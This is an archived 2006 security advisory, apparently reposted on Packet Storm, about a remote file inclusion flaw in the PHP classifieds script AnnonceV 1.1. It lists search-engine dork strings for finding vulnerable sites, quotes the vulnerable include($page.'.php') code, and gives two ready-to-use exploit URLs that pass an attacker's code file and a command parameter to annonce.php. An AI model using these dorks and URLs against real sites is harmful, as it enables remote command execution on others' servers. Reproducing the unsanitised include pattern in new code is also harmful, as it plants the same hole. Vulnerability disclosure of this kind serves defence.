annoncev.txt

2006-09-07T00:00:00
ID PACKETSTORM:49764
Type packetstorm
Reporter Andries Bruinsma
Modified 2006-09-07T00:00:00

Description

                                        
                                            `* Kurdish Security Advisory  
* Original Adv : http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-26-annoncev-news.html  
* Script : AnnonceV   
* Site : http://www.comscripts.com/scripts/php.annoncesv.1895.html  
* Version : 1.1  
* Risk : High  
* Class : Remote   
* Contact : botan@linuxmail.org and irc.gigachat.net #kurdhack  
* Nice crackerz sh00tz:milex,b3g0k,azad,fearless,darki,qawiste and other my friends  
-----------------------------------------------------------------------------------  
  
Google w0rkez :P : "AnnonceV1.1"   
: "/admin/annonce.php"   
: "/annonce.php"  
  
lol now code :]  
  
$page=$_GET['page'];  
  
  
if(substr($page, -3) == 'txt')//pour les news  
{  
include("newsdisplay.php");  
}  
  
else //pour toutes les autres pages  
{  
include($page.".php");  
}  
  
?>  
  
http://www.site.com/annonce.php?page=yourcode.txt?&cmd=id  
http://www.site.com/admin/annonce.php?page=yourcode.txt?&cmd=id  
`